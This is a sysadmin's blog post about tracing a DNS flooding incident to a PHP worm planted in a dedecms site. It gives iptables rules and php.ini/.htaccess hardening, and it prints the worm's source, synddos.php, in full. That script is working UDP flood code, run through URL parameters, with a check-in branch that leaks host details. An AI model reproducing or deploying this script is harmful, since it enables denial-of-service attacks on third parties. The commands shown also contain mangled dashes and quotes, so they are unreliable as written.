Home > Networking Security, Security > resolved – port 53 dns flooding attack

resolved – port 53 dns flooding attack

April 13th, 2012


I found this port 53 dns flooding attack when the server became very unsteady. NIC was blipping and networking just went down without OS rebooting.

Using ntop as detector, I found the issue with DNS traffic was at a very high level(about 3Gb traffic). Then I determined to forbid DNS traffic, and only allow some usual ports.

  • stop iptables and disable autoboot of iptables
/etc/init.d/iptables stop
mv /etc/rc3.d/S08iptables /etc/rc3.d/s08iptables
  • here’s the rules

[root@doxer ~]# cat iptables-stop-flood.sh

#!/bin/bash
iptables -F
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP

#todo – allow no more than 5 new connections per second
#iptables -A INPUT -p tcp –syn -m limit –limit 5/s -i eth0 -j ACCEPT

# Allow traffic already established to continue
iptables -A INPUT -p all -m state –state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p all -m state –state INVALID -j DROP

#Allow ftp, http, mysql
#todo – if there’s no -m, than –dport or –sport must be in a range
#todo – –ports source and destination ports are assumed to be the same
iptables -A INPUT -p tcp -m multiport –dport 20,21,80,3306 -j ACCEPT
iptables -A OUTPUT -p tcp -m multiport –sport 20,21,80,3000,3306 -j ACCEPT

#Allow outgoing httpd like telnet doxer 80
iptables -A OUTPUT -p tcp –dport 80 -j ACCEPT

#Allow ntop
iptables -A INPUT -p udp -m multiport –dport 3000 -j ACCEPT
iptables -A INPUT -p tcp -m multiport –dport 3000 -j ACCEPT

#Allow sftp
iptables -A INPUT -p tcp –dport 115 -j ACCEPT
iptables -A OUTPUT -p tcp –sport 115 -j ACCEPT

#Allow outgoing ssh
iptables -A INPUT -p tcp –dport 22 -j ACCEPT
iptables -A INPUT -p tcp –sport 22 -j ACCEPT
iptables -A OUTPUT -p tcp –dport 22 -j ACCEPT
iptables -A OUTPUT -p tcp –sport 22 -j ACCEPT

#allow rsync
iptables -A OUTPUT -p tcp –dport 873 -j ACCEPT
iptables -A OUTPUT -p tcp –sport 873 -j ACCEPT
iptables -A INPUT -p tcp –sport 873 -j ACCEPT
iptables -A INPUT -p tcp –dport 873 -j ACCEPT

#allow ftp passive mode(you need set vsftpd first)
iptables -A INPUT -p tcp –sport 21 -m state –state ESTABLISHED -j ACCEPT
iptables -A INPUT -p tcp –sport 20 -m state –state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp –dport 35000:37000 -j ACCEPT
iptables -A OUTPUT -p tcp –sport 35000:37000 -j ACCEPT

#Allow ping & nslookup. reply is 8, request is 0
#allow other hosts to ping
iptables -A INPUT -p icmp –icmp-type 8 -m limit –limit 1/s -j ACCEPT
#iptables -A INPUT -p icmp –icmp-type 8 -j ACCEPT
iptables -A OUTPUT -p icmp –icmp-type 0 -j ACCEPT
#allow this host ping others
iptables -A INPUT -p icmp –icmp-type 0 -j ACCEPT
iptables -A OUTPUT -p icmp –icmp-type 8 -j ACCEPT

#allow dns query
#iptables -A OUTPUT -p udp –dport 53 -m state –state NEW,ESTABLISHED -j ACCEPT
#iptables -A INPUT -p udp –sport 53 -m state –state ESTABLISHED -j ACCEPT
#iptables -A OUTPUT -p tcp –dport 53 -m state –state NEW,ESTABLISHED -j ACCEPT
#iptables -A INPUT -p tcp –sport 53 -m state –state ESTABLISHED -j ACCEPT

# Allow local loopback services
iptables -A INPUT -i lo -j ACCEPT

#save and restart iptables
/etc/init.d/iptables save
/etc/init.d/iptables restart

  • run the rules

chmod +x ./iptables-stop-flood.sh && ./iptables-stop-flood.sh

  • enable autoboot of iptables
If everything is ok, enable autoboot of iptables:
mv /etc/rc3.d/s08iptables /etc/rc3.d/S08iptables

After all these steps, dns traffic now dropped to normal status.

NB:

After several days’ investigation, I finally found out that this attack was source from some worms(php worms?) embedded in dedecms’s directory. Here’s one file called synddos.php:

<?php
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_REQUEST['time'];
$Sendlen = 65535;
$packets = 0;
ignore_user_abort(True);

if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
if (StrLen($_GET['rat'])<>0){
echo $_GET['rat'].$_SERVER["HTTP_HOST"].”|”.GetHostByName($_SERVER['SERVER_NAME']).”|”.php_uname().”|”.$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
exit;
}
echo “Warning to: opening”;
exit;
}

for($i=0;$i<$Sendlen;$i++){
$out .= “A”;
}

$max_time = time()+$exec_time;

while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen(“udp://$host”, $port, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}

echo “Send Host:$host:$port<br><br>”;
echo “Send Flow:$packets * ($Sendlen/1024=” . round($Sendlen/1024, 2) . “)kb / 1024 = ” . round($packets*$Sendlen/1024/1024, 2) . ” mb<br><br>”;
echo “Send Rate:” . round($packets/$exec_time, 2) . ” packs/s;” . round($packets/$exec_time*$Sendlen/1024/1024, 2) . ” mb/s”;
?>

This is crazy! That explains the reason why there was so much DNS traffic out!

To cure this weakness:

1.disable fsockopen function in php.ini

disable_functions = fsockopen

2.in .htaccess file, limit php scripts from running

RewriteEngine on
RewriteCond % !^$
RewriteRule uploads/(.*).(php)$ – [F]
RewriteRule data/(.*).(php)$ – [F]
RewriteRule templets/(.*).(php)$ – [F]


Categories: Networking Security, Security Tags: , , , , ,